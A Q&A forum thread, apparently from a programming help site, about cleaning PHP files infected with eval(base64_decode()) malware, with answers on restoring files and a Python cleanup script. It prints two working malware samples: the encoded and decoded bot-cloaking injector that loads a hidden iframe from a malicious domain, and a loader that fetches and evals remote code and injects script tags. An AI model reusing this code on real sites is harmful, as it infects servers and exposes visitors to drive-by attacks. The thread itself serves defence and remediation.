How to get rid of eval-base64_decode like PHP virus files?

Question

My site (very large community website) was recently infected with a virus. Every index.php file was changed so that the opening php tag of these files it was changed to the following line:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0=')); 

When I decoded this, it produced the following PHP code:

    <?php error_reporting(0); $bot = FALSE ; $user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api'); $stop_ips_masks = array(     array("216.239.32.0","216.239.63.255"),     array("64.68.80.0"  ,"64.68.87.255"  ),     array("66.102.0.0",  "66.102.15.255"),     array("64.233.160.0","64.233.191.255"),     array("66.249.64.0", "66.249.95.255"),     array("72.14.192.0", "72.14.255.255"),     array("209.85.128.0","209.85.255.255"),     array("198.108.100.192","198.108.100.207"),     array("173.194.0.0","173.194.255.255"),     array("216.33.229.144","216.33.229.151"),     array("216.33.229.160","216.33.229.167"),     array("209.185.108.128","209.185.108.255"),     array("216.109.75.80","216.109.75.95"),     array("64.68.88.0","64.68.95.255"),     array("64.68.64.64","64.68.64.127"),     array("64.41.221.192","64.41.221.207"),     array("74.125.0.0","74.125.255.255"),     array("65.52.0.0","65.55.255.255"),     array("74.6.0.0","74.6.255.255"),     array("67.195.0.0","67.195.255.255"),     array("72.30.0.0","72.30.255.255"),     array("38.0.0.0","38.255.255.255")     ); $my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR'])); foreach ( $stop_ips_masks as $IPs ) {     $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));     if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;} } foreach ($user_agent_to_filter as $bot_sign){     if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;} } if (!$bot) { echo '<div style="position: absolute; left: -1999px; top: -2999px;"><iframe src="http://lzqqarkl.co.cc/QQkFBwQGDQMGBwYAEkcJBQcEAAcDAAMBBw==" width="2" height="2"></iframe></div>'; } 

I've tried several things to clean the virus even restoring from a backup and the files get re-infected after a few minutes or hours. So can you please help me?

What do you know about this virus?

Is there a known security hole it uses to install and propagate?

What does the above php code actually does?

What does the page it embeds in the iframe does?

And of course more importantly: What can i do to get rid of it?

Please help, we have been almost run out of ideas and hope :(

UPDATE1 Some more details: A weird thing is: When we first checked the infected files. They were changed but their modified time in the ftp program was showing last access to be days, months or even years ago in some cases! How is this even possible? It drives me crazy!

UPDATE 2 I think the problem initiated after a user installed a plugin in his Wordpress installation. After restoring from backup and completely deleting the Wordpress folder and the associated db the problem seems gone. We have currently subscribed to a security service and they are investigating the issue just to be sure the hack is gone for good. Thanks for anyone who replied.

Answer 1

Steps to recover and disinfect your site (provided you have a known good backup).

1) Shutdown the Site

You need to basically close the door to your site before you do your remedial work. This will prevent visitors getting malicious code, seeing error messages, etc. Just good practice.

You should be able to do this by putting the following into your .htaccess file in the webroot. (Replace "!!Your IP Address Here!!" with your own IP address - see http://icanhazip.com if you don't know your IP address.)

order deny,allow deny from all allow from !!Your IP Address Here!! 

2) Download a Copy of All of your Files from the Server

Download everything into a separate folder from your good backups. This may take a while (dependent on your site size, connection speed, etc).

3) Download and Install a File/Folder Comparison Utility

On a Windows machine, you can use WinMerge - http://winmerge.org/ - it's free and quite powerful. On a MacOS machine, check out the list of possible alternates from Alternative.to

4) Run the File/Folder Comparison Utility

You should end up with a few different results:

• Files are Identical - The current file is the same as your backup, and so is unaffected.
• File on Left/Right Side Only - That file either only exists in the backup (and may have been deleted from the server), or only exists on the server (and may have been injected/created by the hacker).
• File is Different - The file on the server is not the same as the one in the backup, so it may have been modified by you (to configure it for the server) or by the hacker (to inject code).

5) Resolve the Differences

(a.k.a "Why can't we all just get along?")

For Files which are Identical, no further action is required. For Files which Exist on One Side Only, look at the file and figure out whether they are legitimate (ie user uploads which should be there, additional files you may have added, etc.) For Files which are Different, look at the file (the File Difference Utility may even show you which lines have been added/modified/removed) and see whether the server version is valid. Overwrite (with the backed-up version) any files which contain malicious code.

6) Review your Security Precautions

Whether this is as simple as changing your FTP/cPanel Passwords, or reviewing your use of external/uncontrolled resources (as you mention you are performing alot of fgets, fopens, etc. you may want to check the parameters being passed to them as that is a way to make scripts pull in malicious code), etc.

7) Check the Site Works

Take the opportunity of being the only person looking at the site to make sure that everything is still operating as expected, after the infected files are corrected and malicious files have been removed.

8) Open the Doors

Reverse the changes made in the .htaccess file in Step 1. Watch carefully. Keep an eye on your visitor and error logs to see if anyone tries to trigger the removed malicious files, etc.

9) Consider Automated Detection Methods

There are a few solutions, allowing for you to have an automated check performed on your host (using a CRON job) which will detect and detail any changes which occur. Some are a bit verbose (you will get an email for each and every file changed), but you should be able to adapt them to your needs:

• Tripwire - a PHP script to detect and report new, deleted or modified files
• Shell script to monitor file changes
• How to detect if your webserver is hacked and get alerted

10) Have Scheduled Backups, and Retain a Good Bracket

Make sure you have scheduled backups performed on your website, keep a few of them, so you have different steps you can go back in time, if necessary. For instance, if you performed weekly backups, you might want to keep the following:

• 4 x Weekly Backups
• 4 x Monthly Backups (you retain one of the Weekly Backups, maybe the first week of the month, as the Monthly Backup)

These will always make life easier if you have someone attack your site with something a bit more destructive than a code injection attack.

Oh, and ensure you backup your databases too - with alot of sites being based on CMSes, having the files is nice, but if you lose/corrupt the database behind them, well, the backups are basically useless.

Answer 2

I suffered from the same hack job. I was able to decrypt the code as well, and while I got different php code, I started by removing the injected php text by looping through each php file in the site and removing the eval call. I am still investigating how I got it to begin with but here is what mine looked like after decrypting from this website:

To decode the encrypted php script on each php file use this: http://www.opinionatedgeek.com/dotnet/tools/base64decode/

And formatting the result using this guy: http://beta.phpformatter.com/

To clean you need to remove the "eval" line from the top of each php file, and delete the .log folders from the base folder of the website.

I found a python script which I modified slightly to remove the trojan in php files so I will post it here for others to use: code source from thread: replace ALL instances of a character with another one in all files hierarchically in directory tree

import os import re import sys  def try_to_replace(fname):     if replace_extensions:          return fname.lower().endswith(".php")     return True   def file_replace(fname, pat, s_after):     # first, see if the pattern is even in the file.     with open(fname) as f:         if not any(re.search(pat, line) for line in f):             return # pattern does not occur in file so we are done.      # pattern is in the file, so perform replace operation.     with open(fname) as f:         out_fname = fname + ".tmp"         out = open(out_fname, "w")         for line in f:             out.write(re.sub(pat, s_after, line))         out.close()         os.rename(out_fname, fname)   def mass_replace(dir_name, s_before, s_after):     pat = re.compile(s_before)     for dirpath, dirnames, filenames in os.walk(dir_name):         for fname in filenames:             if try_to_replace(fname):                 print "cleaning: " + fname                 fullname = os.path.join(dirpath, fname)                 file_replace(fullname, pat, s_after)  if len(sys.argv) != 2:     u = "Usage: rescue.py <dir_name>\n"     sys.stderr.write(u)     sys.exit(1)  mass_replace(sys.argv[1], "eval\(base64_decode\([^.]*\)\);", "") 

to use type

python rescue.py rootfolder

This is what the malicious script was trying to do:

<?php  if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) {     $_SERVER['mr_no'] = 1;     if (!function_exists('mrobh')) {         function get_tds_777($url)         {             $content = "";             $content = @trycurl_777($url);             if ($content !== false)                 return $content;              $content = @tryfile_777($url);             if ($content !== false)                 return $content;             $content = @tryfopen_777($url);             if ($content !== false)                 return $content;             $content = @tryfsockopen_777($url);             if ($content !== false)                 return $content;             $content = @trysocket_777($url);             if ($content !== false)                 return $content;             return '';         }          function trycurl_777($url)         {             if (function_exists('curl_init') === false)                 return false;             $ch = curl_init();             curl_setopt($ch, CURLOPT_URL, $url);             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);             curl_setopt($ch, CURLOPT_TIMEOUT, 5);             curl_setopt($ch, CURLOPT_HEADER, 0);             $result = curl_exec($ch);             curl_close($ch);             if ($result == "")                 return false;             return $result;         }         function tryfile_777($url)         {             if (function_exists('file') === false)                 return false;             $inc = @file($url);             $buf = @implode('', $inc);             if ($buf == "")                 return false;             return $buf;         }         function tryfopen_777($url)         {             if (function_exists('fopen') === false)                 return false;             $buf = '';             $f   = @fopen($url, 'r');             if ($f) {                 while (!feof($f)) {                     $buf .= fread($f, 10000);                 }                 fclose($f);             } else                 return false;             if ($buf == "")                 return false;             return $buf;         }         function tryfsockopen_777($url)         {             if (function_exists('fsockopen') === false)                 return false;             $p    = @parse_url($url);             $host = $p['host'];             $uri  = $p['path'] . '?' . $p['query'];             $f    = @fsockopen($host, 80, $errno, $errstr, 30);             if (!$f)                 return false;             $request = "GET $uri HTTP/1.0\n";             $request .= "Host: $host\n\n";             fwrite($f, $request);             $buf = '';             while (!feof($f)) {                 $buf .= fread($f, 10000);             }             fclose($f);             if ($buf == "")                 return false;             list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);             return $buf;         }         function trysocket_777($url)         {             if (function_exists('socket_create') === false)                 return false;             $p    = @parse_url($url);             $host = $p['host'];             $uri  = $p['path'] . '?' . $p['query'];             $ip1  = @gethostbyname($host);             $ip2  = @long2ip(@ip2long($ip1));             if ($ip1 != $ip2)                 return false;             $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);             if (!@socket_connect($sock, $ip1, 80)) {                 @socket_close($sock);                 return false;             }             $request = "GET $uri HTTP/1.0\n";             $request .= "Host: $host\n\n";             socket_write($sock, $request);             $buf = '';             while ($t = socket_read($sock, 10000)) {                 $buf .= $t;             }             @socket_close($sock);             if ($buf == "")                 return false;             list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf);             return $buf;         }         function update_tds_file_777($tdsfile)         {             $actual1 = $_SERVER['s_a1'];             $actual2 = $_SERVER['s_a2'];             $val     = get_tds_777($actual1);             if ($val == "")                 $val = get_tds_777($actual2);             $f = @fopen($tdsfile, "w");             if ($f) {                 @fwrite($f, $val);                 @fclose($f);             }             if (strstr($val, "|||CODE|||")) {                 list($val, $code) = explode("|||CODE|||", $val);                 eval(base64_decode($code));             }             return $val;         }         function get_actual_tds_777()         {             $defaultdomain = $_SERVER['s_d1'];             $dir           = $_SERVER['s_p1'];             $tdsfile       = $dir . "log1.txt";             if (@file_exists($tdsfile)) {                 $mtime = @filemtime($tdsfile);                 $ctime = time() - $mtime;                 if ($ctime > $_SERVER['s_t1']) {                     $content = update_tds_file_777($tdsfile);                 } else {                     $content = @file_get_contents($tdsfile);                 }             } else {                 $content = update_tds_file_777($tdsfile);             }             $tds = @explode("\n", $content);             $c   = @count($tds) + 0;             $url = $defaultdomain;             if ($c > 1) {                 $url = trim($tds[mt_rand(0, $c - 2)]);             }             return $url;         }         function is_mac_777($ua)         {             $mac = 0;             if (stristr($ua, "mac") || stristr($ua, "safari"))                 if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone")))                     $mac = 1;             return $mac;         }         function is_msie_777($ua)         {             $msie = 0;             if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9"))                 $msie = 1;             return $msie;         }         function setup_globals_777()         {             $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/";             $mz = "/tmp/";             if (!@is_dir($rz)) {                 @mkdir($rz);                 if (@is_dir($rz)) {                     $mz = $rz;                 } else {                     $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/";                     if (!@is_dir($rz)) {                         @mkdir($rz);                         if (@is_dir($rz)) {                             $mz = $rz;                         }                     } else {                         $mz = $rz;                     }                 }             } else {                 $mz = $rz;             }             $bot = 0;             $ua  = $_SERVER['HTTP_USER_AGENT'];             if (stristr($ua, "msnbot") || stristr($ua, "Yahoo"))                 $bot = 1;             if (stristr($ua, "bingbot") || stristr($ua, "google"))                 $bot = 1;             $msie = 0;             if (is_msie_777($ua))                 $msie = 1;             $mac = 0;             if (is_mac_777($ua))                 $mac = 1;             if (($msie == 0) && ($mac == 0))                 $bot = 1;             global $_SERVER;             $_SERVER['s_p1']     = $mz;             $_SERVER['s_b1']     = $bot;             $_SERVER['s_t1']     = 1200;             $_SERVER['s_d1']     = base64_decode('http://ens122zzzddazz.com/');             $d                   = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]);             $_SERVER['s_a1']     = base64_decode('http://cooperjsutf8.ru/g_load.php') . $d;             $_SERVER['s_a2']     = base64_decode('http://nlinthewood.com/g_load.php') . $d;             $_SERVER['s_script'] = "nl.php?p=d";         }         setup_globals_777();         if (!function_exists('gml_777')) {             function gml_777()             {                 $r_string_777 = '';                 if ($_SERVER['s_b1'] == 0)                     $r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>';                 return $r_string_777;             }         }         if (!function_exists('gzdecodeit')) {             function gzdecodeit($decode)             {                 $t     = @ord(@substr($decode, 3, 1));                 $start = 10;                 $v     = 0;                 if ($t & 4) {                     $str = @unpack('v', substr($decode, 10, 2));                     $str = $str[1];                     $start += 2 + $str;                 }                 if ($t & 8) {                     $start = @strpos($decode, chr(0), $start) + 1;                 }                 if ($t & 16) {                     $start = @strpos($decode, chr(0), $start) + 1;                 }                 if ($t & 2) {                     $start += 2;                 }                 $ret = @gzinflate(@substr($decode, $start));                 if ($ret === FALSE) {                     $ret = $decode;                 }                 return $ret;             }         }         function mrobh($content)         {             @Header('Content-Encoding: none');             $decoded_content = gzdecodeit($content);             if (preg_match('/\<\/body/si', $decoded_content)) {                 return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content);             } else {                 return $decoded_content . gml_777();             }         }         ob_start('mrobh');     } }  ?>